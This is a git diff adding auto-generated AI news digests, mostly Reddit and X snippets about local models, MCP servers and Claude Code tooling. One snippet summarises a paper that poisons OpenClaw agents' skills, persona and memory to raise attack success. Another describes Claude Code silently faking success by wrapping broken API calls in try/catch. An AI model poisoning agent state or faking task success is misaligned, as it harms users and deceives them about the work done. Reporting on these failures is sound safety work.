structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project. When projects are imported, only t + +--- + +## [I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks](https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 +Tags: mcp, open_source, developer_tool, cli_tool + +> I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli. It's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it: * **Claude Code** — runs `soft-ue-cli` commands in the terminal * **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`) Here's what a typical session looks like. I ask Claude to "inspect the player Blueprint and add a healt + +--- + +## [Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB](https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/) +*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> Hi guys, We’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source. The biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t + +--- + +## [Claude Code via VSCode extension still uses more tokens than Claude Code via terminal](https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 +Tags: developer_tool, cli_tool + +> Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. Other people seem to have had the same experience: https://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/ https://github.com/anthropics/claude-code/issues/19908 Due to this it makes no sense to use it as you're essent + +--- + +## [What are your favorite MCP servers to use with Claude Code?](https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. Curious what else people are running and whether it’s actually worth it. + +--- + +## [I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed](https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/) +*Reddit r/ClaudeAI* | 04/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally. Here's what's live right now: **Health and science:** * [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac + +--- + +## [Basic PSA. PocketPal got updated, so runs Gemma 4.](https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: tool_update + +> Just because I've seen a couple of "I want this on Android" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates. I'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat. But yeah, 2B and 4B work fine and quickly under PocketPal. Hopefully their next one is 7-8B (not 9B + +--- + +## [Local Claude Code with Qwen3.5 27B](https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: cli_tool + +> after long research, finding best alternative for [Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) to use totally local environment for coding tasks I found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) how to disable telemetry and make claude code totally offline. model used - Qwen3.5 27B Quant used - u + +--- + +## [Gemma 4 vs Qwen3.5 on SVG style](https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: api_update + +> Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth. I was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs! Did you find any areas when Qwen3.5 beats Gemma4 ? + +--- + +## [[P] MCGrad: fix calibration of your ML model in subgroups](https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/) +*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 +Tags: developer_tool + +> Hi r/MachineLearning, We’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026. **The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., "users in region X on mobile devices"). Multicalibration aims to ensure reliability across such subpopulations. **The Solution:** MCGrad reformulates multicalibration + +--- + +## [Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily](https://x.com/DoctorYev/status/2040484581581951473) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: tool_update + +> Matthew Berman launched Journey, a tool for agents to discover and install full workflows. Braygent would post about why workflow discovery is the missing piece of the agent ecosystem. + +--- + +## [Clement Delangue Is Telling Everyone to Move to Open and Local Models](https://x.com/peteskomoroch/status/2040516928461303930) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: open_source + +> HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy. + +--- + +## [Voting for our open source AI art competition is open for the next 45 hours](https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/) +*Reddit r/StableDiffusion* | 04/04/2026 | Score: 1.00 +Tags: open_source + +> If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used! + +--- + +## [We absolutely need Qwen3.6-397B-A17B to be open source](https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/) +*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 +Tags: open_source + +> The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. It feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet. We have been comparing OS models with claude sonnet and opus left and right mont + +--- + diff --git a/data/digest-2026-04-06.md b/data/digest-2026-04-06.md new file mode 100644 index 0000000..23d6f97 --- /dev/null +++ b/data/digest-2026-04-06.md @@ -0,0 +1,119 @@ +# Stack Scout - AI News Digest +**2026-04-06** | 15 stories | Auto-generated from 651 archived stories + +--- + +## [RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models](https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch, open_source, developer_tool + +--- + +## [[P] Easily provide Wandb logs as context to agents for analysis and planning.](https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/) +*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> It is frustrating to use the Wandb CLI and MCP tools with my agents. For one, the MCP tool basically floods the context window and frequently errors out :/ So I built a cli tool that: * imports my wandb projects; * uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs; * is easy to use for agents; * provides greater context of past experiments; * does not flood the context window; and * easily tune exploration-exploitation while planning Would lov + +--- + +## [Gemma4:26b's reasoning capabilities are crazy.](https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability. The script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central + +--- + +## [[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?](https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/) +*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Every few months someone posts about "long-term memory for LLMs" and the thread fills with retrieval strategies, vector databases, and context window tricks. Good engineering. Wrong level of abstraction. The continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem. Here is the distinction: **Retrieval-level continuity:** The agent can surface relevant context from past interactions. This is solved well enough with embedding search, hierarchical sum + +--- + +## [Claude Code can now submit your app to App Store Connect and help you pass review](https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/) +*Reddit r/ClaudeAI* | 06/04/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code. The problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. So I built MCP servers that let Claude Code handle the whole thing. What Claude Code can do through Blitz: * Create and edit + +--- + +## [Apex Protocol – An open MCP-based standard for AI agent trading](https://apexstandard.org/) +*Hacker News* | 06/04/2026 | Score: 1.00 +Tags: mcp, agent_tool + +--- + +## [I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)](https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 +Tags: developer_tool, cli_tool + +> Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases. ## How it works - **Phase 1 (capture)**: Records live browser traffic via playwright-cli - **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code - **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing) - **Phase 4 (standards)**: 3 parallel Claude + +--- + +## [I spent 3 months evolving SmartGallery into a free professional Local First DAM. v2.11 launches on April 9th](https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/) +*Reddit r/StableDiffusion* | 06/04/2026 | Score: 0.86 +Tags: product_launch, tool_update + +> https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae **Hi everyone!** Many of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators. * I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com) * ** + +--- + +## [Mercury – Free MCP proxy that cuts non-English token costs by 28-64%](https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/) +*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. The culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English. The fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. It uses Google Translate (free, no API key needed) by default, so transl + +--- + +## [Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight](https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/) +*MarkTechPost* | Score: 0.82 +Tags: open_source, developer_tool + +--- + +## [I built a macOS widget to track Claude usage limits in real-time](https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/) +*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.62 +Tags: api_update, open_source + +> Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. What it does: * Displays both the 5-hour session and 7-day weekly usage windows with progress bars * Shows countdown timers for when each window resets * Color-coded indicators — green → yellow → orange → red as you approach the limit * Auto-refreshes every 5 minutes * Comes in small, medium, and large widget sizes Quick demo: It sits rig + +--- + +## [After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success](https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/) +*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.54 +Tags: api_update, tool_update + +> I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't. Here's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on. Three days later you discover the API integration was broken from the start. The agent couldn't get auth working, so it quietly inserted a try/catc + +--- + +## [[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)](https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: agent_tool + +> ***TL;DR***: Q8\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation. **The problem**: On Intel Arc Pro B70, Q8\_0 models ran at 4.88 t/s while Q4\_K\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\_0 only has 1.7x more data. After ruling out VRAM pressure, drivers, and backend issues, we traced it to th + +--- + +## [llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments](https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: product_launch + +> Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards. + +--- + +## [I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac](https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/) +*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 +Tags: open_source + +> So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\_K\_M quantization. The goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware. # The Results (M5 32GB, Q4_K_M, llama-bench) # Top 15 by G + +--- + diff --git a/data/digest-2026-04-07.md b/data/digest-2026-04-07.md new file mode 100644 index 0000000..26d7e73 --- /dev/null +++ b/data/digest-2026-04-07.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-07** | 15 stories | Auto-generated from 570 archived stories + +--- + +## [I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!](https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 1.00 +Tags: api_update, open_source, cli_tool + +> Hey everyone, I'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. I wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to + +--- + +## [[D] MemPalace claims 100% on LoCoMo and a "perfect score on LongMemEval." Its own BENCHMARKS.md documents why neither is meaningful.](https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/) +*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> A new open-source memory project called MemPalace launched yesterday claiming "100% on LoCoMo" and "the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%." The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours. The interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w + +--- + +## [Built an open source memory layer for local AI agents, runs fully offline, no cloud needed](https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine. The problem is pretty simple. Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution. It gives your agents persistent memory that survives restarts and crashes, semant + +--- + +## [Mistral Introduces "Voxtral TTS": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.](https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> ElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face. The model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the "ums" and "ahs" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. Zero shot. --- ####Key Highlights: - → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning - → Beats ElevenLabs Flash v2.5 + +--- + +## [OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update](https://x.com/thdxr/status/2041330695822279077) +*Aligned News (Scoble)* | 07/04/2026 | Score: 1.00 +Tags: cli_tool, tool_update + +> Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements. + +--- + +## [Pro Subscription Usage](https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.94 +Tags: mcp, open_source + +> Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week. I build and host open source "public service" MCP servers with my sub. I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point. Before even entering my first prompt, it showed I had already used 11% of + +--- + +## [Second Brain and Haah: human-agent-agent-human network with Claude](https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain. The idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. But then would not be cool that if I + +--- + +## [stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.](https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/) +*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.70 +Tags: developer_tool, tool_update + +> **tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. haven't bought a tech course since. whenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this: `You are my senior mentor. I have provided documentation + +--- + +## [[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)](https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/) +*Reddit r/MachineLearning* | 08/04/2026 | Score: 1.00 +Tags: agent_tool + +> Paper: https://arxiv.org/abs/2604.04759 This paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem. The authors introduce a taxonomy of persistent agent state: \- Capability (skills / executable code) \- Identity (persona, trust configuration) \- Knowledge (memory) They evaluate 12 attack scenarios on a live system across multiple models. Key results: \- baseline attack success rate: \~10–36.7% \- after pois + +--- + +## [Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions](https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update + +> https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec Hey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings. **TL;DR of my findings:** 1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU + + +--- + +## [Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.](https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: developer_tool + +> Found it on a USB drive in the parking lot. Should be interesting. Seriously tho, props to this guy and his cool Hermes Agent skins library here: https://github.com/joeynyc/hermes-skins + +--- + +## [Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming](https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: tool_update + +> [https://github.com/ikawrakow/ik\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596) This should bring the 31b dense model in a usable speed range for many with dual/multi GPUs. Also today I did quite some PPL Tests today with mainline llama.cpp and ik\_llama.cpp unsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both. Bartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\_lla + +--- + +## [Cloud AI subscriptions are getting desperate with retention. honestly makes me want to go more local](https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: api_update + +> Ok so two things happened this week that made me appreciate my local setup way more tried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to "please stay." thats not confidence lol then claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very "please dont leave" energy their core cust + +--- + +## [[P] A control plane for post-training workflows](https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/) +*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 +Tags: cli_tool + +> We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: Make post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. Post-training models tends to introduce a new axis of complexity - the orchestration and compute ressource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training. Tahuna is CLI-first, it s + +--- + +## [Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve](https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/) +*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 +Tags: open_source + +> AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow. I built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. You can either hit record for a specific task (Focus Record) or let it run in the background where it + +--- + diff --git a/data/digest-2026-04-08.md b/data/digest-2026-04-08.md new file mode 100644 index 0000000..fe89e0a --- /dev/null +++ b/data/digest-2026-04-08.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-08** | 15 stories | Auto-generated from 652 archived stories + +--- + +## [@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators](https://x.com/VadimStrizheus/status/2041498727131517193) +*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 +Tags: api_update, product_launch, tool_update + +> Vugola has launched an API for the world's first agentic clipping tool. Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp. + +--- + +## [Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders](https://x.com/wadefoster/status/2041721371357851859) +*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 +Tags: api_update, developer_tool, agent_tool + +> Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents. + +--- + +## [How I cut Claude Code usage in half (open source)](https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts. I built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs + +--- + +## [I used Claude to build a full networking protocol for AI agents. It’s now at 12K+ nodes across 19 countries.](https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion. The problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th + +--- + +## [Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents](https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 +Tags: api_update, tool_update + +> Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. [https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) + +--- + +## [Meta Releases Muse Spark - A Natively Multimodal Reasoning model](https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration. Blog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/) + +--- + +## [Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms](https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. It builds on LFM2-VL-450M with three new capabilities: * bounding box prediction (81.28 on RefCOCO-M) * multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and * function calling support. Most production vision systems are still multi-stage: a detector, a classifier, + +--- + +## [Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.](https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/) +*Reddit r/StableDiffusion* | 08/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> It's pretty neat, used \~12.5gb out of the box. Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model. And, weights are permissively licensed (MIT) which might encourage more people to hack on it. 